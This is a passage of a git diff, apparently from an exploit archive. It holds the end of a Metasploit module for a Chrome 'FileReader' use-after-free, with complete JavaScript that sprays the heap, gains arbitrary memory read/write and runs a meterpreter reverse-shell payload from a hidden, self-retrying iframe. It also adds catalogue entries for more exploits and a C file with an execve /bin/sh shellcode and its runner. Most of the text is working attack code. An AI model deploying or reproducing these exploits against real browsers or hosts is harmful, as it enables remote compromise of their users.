+      'DefaultTarget'  => 0,
+      'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' },
+      'Targets'        => [ [ 'Automatic', { } ] ],
+      'DisclosureDate' => 'Mar 21 2019'))
+  end
+
+  def on_request_uri(cli, request)
+    print_status("Sending #{request.uri}")
+    if request.uri =~ %r{/exploit.html$}
+      html = %Q^
+<html>
+    <head>
+        <script>
+let myWorker = new Worker('worker.js');
+let reader = null;
+spray = null;               // nested arrays used to hold the sprayed heap contents
+let onprogress_cnt = 0;     // number of times onprogress was called in a round
+let try_cnt = 0;            // number of rounds we tried
+let last = 0, lastlast = 0; // last two AB results from the read
+let tarray = 0;             // TypedArray constructed from the dangling ArrayBuffer
+const string_size = 128 * 1024 * 1024;
+let contents = String.prototype.repeat.call('Z', string_size);
+let f = new File([contents], "text.txt");
+const marker1 = 0x36313233;
+const marker2 = 0x37414546;
+
+const outers = 256;
+const inners = 1024;
+
+function allocate_spray_holders() {
+    spray = new Array(outers);
+    for (let i = 0; i < outers; i++) {
+        spray[i] = new Array(inners);
+    }
+}
+
+function clear_spray() {
+    for (let i = 0; i < outers; i++) {
+        for (let j = 0; j < inners; j++) {
+            spray[i][j] = null;
+        }
+    }
+}
+
+function reclaim_mixed() {
+    // spray the heap to reclaim the freed region
+    let tmp = {};
+    for (let i = 0; i < outers; i++) {
+        for (let j = 0; j + 2 < inners; j+=3) {
+            spray[i][j] = {a: marker1, b: marker2, c: tmp};
+            spray[i][j].c = spray[i][j]     // self-reference to find our absolute address
+            spray[i][j+1] = new Array(8);
+            spray[i][j+2] = new Uint32Array(32);
+        }
+    }
+}
+
+function find_pattern() {
+    const start_offset = 0x00afc000 / 4;
+    for (let i = start_offset; i + 1 < string_size / 4; i++) {
+        if (i < 50){
+            console.log(tarray[i].toString(16));
+        }
+        // multiply by two because of the way SMIs are stored
+        if (tarray[i] == marker1 * 2) {
+            if (tarray[i+1] == marker2 * 2) {
+                console.log(`found possible candidate objectat idx ${i}`);
+                return i;
+            }
+        }
+    }
+    return null;
+}
+
+
+function get_obj_idx(prop_idx) {
+    // find the index of the Object in the spray array
+    tarray[prop_idx] = 0x62626262;
+    for (let i = 0; i < outers; i++) {
+        for (let j = 0; j < inners; j+=1) {
+            try {
+                if (spray[i][j].a == 0x31313131) {
+                    console.log(`found object idx in the spray array: ${i} ${j}`);
+                    return spray[i][j];
+                }
+            } catch (e) {}
+        }
+    }
+}
+
+function ta_read(addr) {
+    // reads an absolute address through the original freed region
+    // only works for ta_absolute_addr + string_size (128MiB)
+    if (addr > ta_absolute_addr && addr < ta_absolute_addr + string_size) {
+        return tarray[(addr-ta_absolute_addr)/4];
+    }
+
+    return 0;
+}
+
+function ta_write(addr, value) {
+    // wrtie to an absolute address through the original freed region
+    // only works for ta_absolute_addr + string_size (128MiB)
+    if (addr % 4 || value > 2**32 - 1 ||
+        addr < ta_absolute_addr ||
+        addr > ta_absolute_addr + string_size) {
+        console.log(`invalid args passed to ta_write(${addr.toString(16)}, ${value}`);
+    }
+    tarray[(addr-ta_absolute_addr)/4] = value;
+}
+
+function get_corruptable_ui32a() {
+    // finds a sprayed Uint32Array, the elements pointer of which also falls into the controlled region
+    for (let i = 0; i < outers; i++) {
+        for (let j = 0; j + 2 < inners; j+=3) {
+            let ui32a_addr = addrof(spray[i][j+2]) - 1;
+            let bs_addr = ta_read(ui32a_addr + 12) - 1;
+            let elements_addr = ta_read(ui32a_addr + 8) - 1;
+            // read its elements pointer
+            // if the elements ptr lies inside the region we have access to
+            if (bs_addr >= ta_absolute_addr && bs_addr < ta_absolute_addr + string_size &&
+                elements_addr >= ta_absolute_addr && elements_addr < ta_absolute_addr + string_size) {
+                console.log(`found corruptable Uint32Array->elements at ${bs_addr.toString(16)}, on Uint32Array idx ${i} ${j}`);
+                return {
+                    bs_addr: bs_addr,
+                    elements_addr: elements_addr,
+                    ui32: spray[i][j+2],
+                    i: i, j: j
+                }
+            }
+        }
+    }
+}
+
+var reader_obj = null;
+var object_prop_taidx = null;
+var ta_absolute_addr = null;
+var aarw_ui32 = null;
+
+function addrof(leaked_obj) {
+    reader_obj.a = leaked_obj;
+    return tarray[object_prop_taidx];
+}
+
+
+function read4(addr) {
+    // save the old values
+    let tmp1 = ta_read(aarw_ui32.elements_addr + 12);
+    let tmp2 = ta_read(aarw_ui32.bs_addr + 16);
+
+    // rewrite the backing store ptr
+    ta_write(aarw_ui32.elements_addr + 12, addr);
+    ta_write(aarw_ui32.bs_addr + 16, addr);
+
+    let val = aarw_ui32.ui32[0];
+
+    ta_write(aarw_ui32.elements_addr + 12, tmp1);
+    ta_write(aarw_ui32.bs_addr + 16, tmp2);
+
+    return val;
+}
+
+function write4(addr, val) {
+    // save the old values
+    let tmp1 = ta_read(aarw_ui32.elements_addr + 12);
+    let tmp2 = ta_read(aarw_ui32.bs_addr + 16);
+
+    // rewrite the backing store ptr
+    ta_write(aarw_ui32.elements_addr + 12, addr);
+    ta_write(aarw_ui32.bs_addr + 16, addr);
+
+    aarw_ui32.ui32[0] = val;
+
+    ta_write(aarw_ui32.elements_addr + 12, tmp1);
+    ta_write(aarw_ui32.bs_addr + 16, tmp2);
+}
+
+function get_rw() {
+    // free up as much memory as possible
+    // spray = null;
+    // contents = null;
+    force_gc();
+
+    // attepmt reclaiming the memory pointed to by dangling pointer
+    reclaim_mixed();
+
+    // access the reclaimed region as a Uint32Array
+    tarray = new Uint32Array(lastlast);
+    object_prop_taidx = find_pattern();
+    if (object_prop_taidx === null) {
+        console.log('ERROR> failed to find marker');
+        window.top.postMessage(`ERROR> failed to find marker`, '*');
+        return;
+    }
+
+    // leak the absolute address of the Object
+    const obj_absolute_addr = tarray[object_prop_taidx + 2] - 1;  // the third property of the sprayed Object is self-referential
+    ta_absolute_addr = obj_absolute_addr - (object_prop_taidx-3)*4
+    console.log(`leaked absolute address of our object ${obj_absolute_addr.toString(16)}`);
+    console.log(`leaked absolute address of ta ${ta_absolute_addr.toString(16)}`);
+
+    reader_obj = get_obj_idx(object_prop_taidx);
+    if (reader_obj == undefined) {
+        console.log(`ERROR> failed to find object`);
+        window.top.postMessage(`ERROR> failed to find object`, '*');
+        return;
+    }
+    // now reader_obj is a reference to the Object, object_prop_taidx is the index of its first inline property from the beginning of tarray
+
+    console.log(`addrof(reader_obj) == ${addrof(reader_obj)}`);
+    aarw_ui32 = get_corruptable_ui32a();
+    // arbitrary read write up after this point
+}
+
+var wfunc = null;
+let meterpreter = unescape("#{Rex::Text.to_unescape(payload.encoded)}");
+
+function rce() {
+    function get_wasm_func() {
+        var importObject = {
+            imports: { imported_func: arg => console.log(arg) }
+        };
+        bc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];
+        wasm_code = new Uint8Array(bc);
+        wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject);
+        return wasm_mod.exports.exported_func;
+    }
+
+    let wasm_func = get_wasm_func();
+    wfunc = wasm_func;
+    // traverse the JSFunction object chain to find the RWX WebAssembly code page
+    let wasm_func_addr = addrof(wasm_func) - 1;
+    let sfi = read4(wasm_func_addr + 12) - 1;
+    let WasmExportedFunctionData = read4(sfi + 4) - 1;
+    let instance = read4(WasmExportedFunctionData + 8) - 1;
+    let rwx_addr = read4(instance + 0x74);
+
+    // write the shellcode to the RWX page
+    if (meterpreter.length % 2 != 0)
+        meterpreter += "\\u9090";
+
+    for (let i = 0; i < meterpreter.length; i += 2) {
+        write4(rwx_addr + i*2, meterpreter.charCodeAt(i) + meterpreter.charCodeAt(i + 1) * 0x10000);
+    }
+
+    // if we got to this point, the exploit was successful
+    window.top.postMessage('SUCCESS', '*');
+    console.log('success');
+    wfunc();
+
+    // invoke the shellcode
+    //window.setTimeout(wfunc, 1000);
+}
+
+function force_gc() {
+    // forces a garbage collection to avoid OOM kills
+    try {
+        var failure = new WebAssembly.Memory({initial: 32767});
+    } catch(e) {
+        // console.log(e.message);
+    }
+}
+
+function init() {
+    abs = [];
+    tarray = 0;
+    onprogress_cnt = 0;
+    try_cnt = 0;
+    last = 0, lastlast = 0;
+    reader = new FileReader();
+
+    reader.onloadend = function(evt) {
+        try_cnt += 1;
+        failure = false;
+        if (onprogress_cnt < 2) {
+            console.log(`less than 2 onprogress events triggered: ${onprogress_cnt}, try again`);
+            failure = true;
+        }
+
+        if (lastlast.byteLength != f.size) {
+            console.log(`lastlast has a different size than expected: ${lastlast.byteLength}`);
+            failure = true;
+        }
+
+        if (failure === true) {
+            console.log('retrying in 1 second');
+            window.setTimeout(exploit, 1);
+            return;
+        }
+
+        console.log(`onloadend attempt ${try_cnt} after ${onprogress_cnt} onprogress callbacks`);
+        try {
+            // trigger the FREE
+            myWorker.postMessage([last], [last, lastlast]);
+        } catch(e) {
+            // an exception with this message indicates that the FREE part of the exploit was successful
+            if (e.message.includes('ArrayBuffer at index 1 could not be transferred')) {
+                get_rw();
+                rce();
+                return;
+            } else {
+                console.log(e.message);
+            }
+        }
+    }
+    reader.onprogress = function(evt) {
+        force_gc();
+        let res = evt.target.result;
+        // console.log(`onprogress ${onprogress_cnt}`);
+        onprogress_cnt += 1;
+        if (res.byteLength != f.size) {
+            // console.log(`result has a different size than expected: ${res.byteLength}`);
+            return;
+        }
+        lastlast = last;
+        last = res;
+    }
+    if (spray === null) {
+        // allocate the spray holders if needed
+        allocate_spray_holders();
+    }
+
+    // clear the spray holder arrays
+    clear_spray();
+
+    // get rid of the reserved ArrayBuffer range, as it may interfere with the exploit
+    try {
+        let failure = new ArrayBuffer(1024 * 1024 * 1024);
+    } catch (e) {
+        console.log(e.message);
+    }
+
+    force_gc();
+}
+
+function exploit() {
+    init();
+    reader.readAsArrayBuffer(f);
+    console.log(`attempt ${try_cnt} started`);
+}
+        </script>
+    </head>
+    <body onload="exploit()">
+    </body>
+</html>
+    ^
+      send_response(cli, html)
+    elsif request.uri =~ %r{/worker.js$}
+      send_response(cli, 'onmessage = function (msg) { }')
+    else
+      uripath = datastore['URIPATH'] || get_resource
+      uripath += '/' unless uripath.end_with? '/'
+      html = %Q^
+<html>
+    <head>
+        <script>
+            function iter() {
+                let iframe = null;
+                try {
+                    iframe = document.getElementById('myframe');
+                    document.body.removeChild(iframe);
+                } catch (e) {}
+
+                iframe = document.createElement('iframe');
+                iframe.src = '#{uripath}exploit.html';
+                iframe.id = 'myframe';
+                iframe.style = "width:0; height:0; border:0; border:none; visibility=hidden"
+                document.body.appendChild(iframe);
+                console.log(document.getElementById('myframe'));
+            }
+
+            function brute() {
+                window.setTimeout(iter, 1000);
+                let interval = window.setInterval(iter, 15000);
+
+                window.onmessage = function(e) {
+                    if (e.data.includes('SUCCESS')) {
+                        console.log('exploit successful!');
+                        window.clearInterval(interval);
+                    }
+                    console.log(e);
+                }
+            }
+        </script>
+    </head>
+    <body onload="brute()"></body>
+</html>
+    ^
+      send_response(cli, html)
+    end
+  end
+
+end
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 11fba4ea6..25a2fabd3 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6410,6 +6410,7 @@ id,file,description,date,author,type,platform,port
 46793,exploits/windows/dos/46793.txt,"SolarWinds DameWare Mini Remote Control 10.0 - Denial of Service",2019-05-03,"Dino Barlattani",dos,windows,
 46803,exploits/ios/dos/46803.c,"iOS 12.1.3 - 'cfprefsd' Memory Corruption",2019-05-06,ZecOps,dos,ios,
 46806,exploits/windows/dos/46806.py,"Easy Chat Server 3.1 - 'message' Denial of Service (PoC)",2019-05-07,"Miguel Mendez Z",dos,windows,
+46810,exploits/windows/dos/46810.py,"jetAudio 8.1.7.20702 Basic - 'Enter URL' Denial of Service (PoC)",2019-05-08,"Victor Mondragón",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10455,6 +10456,7 @@ id,file,description,date,author,type,platform,port
 46779,exploits/windows/local/46779.py,"DeviceViewer 3.12.0.1 - 'user' SEH Overflow",2019-04-30,"Hayden Wright",local,windows,
 46802,exploits/windows/local/46802.txt,"NSClient++ 0.5.2.35 - Privilege Escalation",2019-05-06,bzyo,local,windows,
 46805,exploits/windows/local/46805.py,"Admin Express 1.2.5.485 - 'Folder Path' Local SEH Alphanumeric Encoded Buffer Overflow",2019-05-07,"Connor McGarr",local,windows,
+46807,exploits/linux/local/46807.txt,"MiniFtp - 'parseconf_load_setting' Buffer Overflow",2019-05-08,strider,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17384,6 +17386,10 @@ id,file,description,date,author,type,platform,port
 46792,exploits/linux/remote/46792.py,"Blue Angel Software Suite - Command Execution",2019-05-03,"Paolo Serracino_ Pietro Minniti_ Damiano Proietti",remote,linux,
 46795,exploits/hardware/remote/46795.rb,"LG Supersign EZ CMS - Remote Code Execution (Metasploit)",2019-05-06,"Alejandro Fanjul",remote,hardware,9080
 46797,exploits/windows/remote/46797.py,"Xitami Web Server 2.5 - Remote Buffer Overflow (SEH + Egghunter)",2019-05-06,ElSoufiane,remote,windows,80
+46808,exploits/windows/remote/46808.py,"Lotus Domino 8.5.3 - 'EXAMINE' Stack Buffer Overflow DEP/ASLR Bypass (NSA's EMPHASISMINE)",2019-05-08,"Charles Truscott",remote,windows,143
+46812,exploits/windows_x86/remote/46812.rb,"Google Chrome 72.0.3626.119 - 'FileReader' Use-After-Free (Metasploit)",2019-05-08,Metasploit,remote,windows_x86,
+46813,exploits/multiple/remote/46813.rb,"PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)",2019-05-08,Metasploit,remote,multiple,5432
+46814,exploits/multiple/remote/46814.rb,"Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit)",2019-05-08,Metasploit,remote,multiple,7001
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41234,3 +41240,4 @@ id,file,description,date,author,type,platform,port
 46798,exploits/php/webapps/46798.txt,"PHPads 2.0 - 'click.php3?bannerID' SQL Injection",2019-05-06,"felipe andrian",webapps,php,80
 46799,exploits/asp/webapps/46799.txt,"microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection",2019-05-06,"felipe andrian",webapps,asp,80
 46804,exploits/multiple/webapps/46804.txt,"Prinect Archive System 2015 Release 2.6 - Cross-Site Scripting",2019-05-07,alt3kx,webapps,multiple,80
+46811,exploits/linux/webapps/46811.txt,"NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal / Authorization Bypass",2019-05-08,MobileNetworkSecurity,webapps,linux,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 7ed17ea82..f3f795aff 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -963,3 +963,4 @@ id,file,description,date,author,type,platform
 46791,shellcodes/linux_x86/46791.c,"Linux/x86 - Openssl Encrypt Files With aes256cbc Shellcode (185 bytes)",2019-05-03,strider,shellcode,linux_x86
 46800,shellcodes/generator/46800.txt,"Linux/x86 - Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes)",2019-05-06,"Xavi Beltran",shellcode,generator
 46801,shellcodes/linux_x86/46801.txt,"Linux/x86 - shred file Shellcode (72 bytes)",2019-05-06,strider,shellcode,linux_x86
+46809,shellcodes/linux_x86/46809.c,"Linux/x86 - execve /bin/sh Shellcode (20 bytes)",2019-05-08,Rajvardhan,shellcode,linux_x86
diff --git a/shellcodes/linux_x86/46809.c b/shellcodes/linux_x86/46809.c
new file mode 100644
index 000000000..acb36488d
--- /dev/null
+++ b/shellcodes/linux_x86/46809.c
@@ -0,0 +1,31 @@
+/*
+# Linux/x86 - execve /bin/sh shellcode (20 bytes)
+# Author: Rajvardhan
+# Tested on: i686 GNU/Linux
+# Shellcode Length: 20
+
+Disassembly of section .text:
+
+08049000 <.text>:
+ 8049000:       31 c9                   xor    %ecx,%ecx
+ 8049002:       6a 0b                   push   $0xb
+ 8049004:       58                      pop    %eax
+ 8049005:       51                      push   %ecx
+ 8049006:       68 2f 2f 73 68          push   $0x68732f2f
+ 804900b:       68 2f 62 69 6e          push   $0x6e69622f
+ 8049010:       89 e3                   mov    %esp,%ebx
+ 8049012:       cd 80                   int    $0x80
+
+===============poc by Rajvardhan=========================
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char shellcode[] = "\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
+main()
+{
+printf("Shellcode Length: %d\n", strlen(shellcode));
+int (*ret)() = (int(*)())shellcode;
+ret();
+}
\ No newline at end of file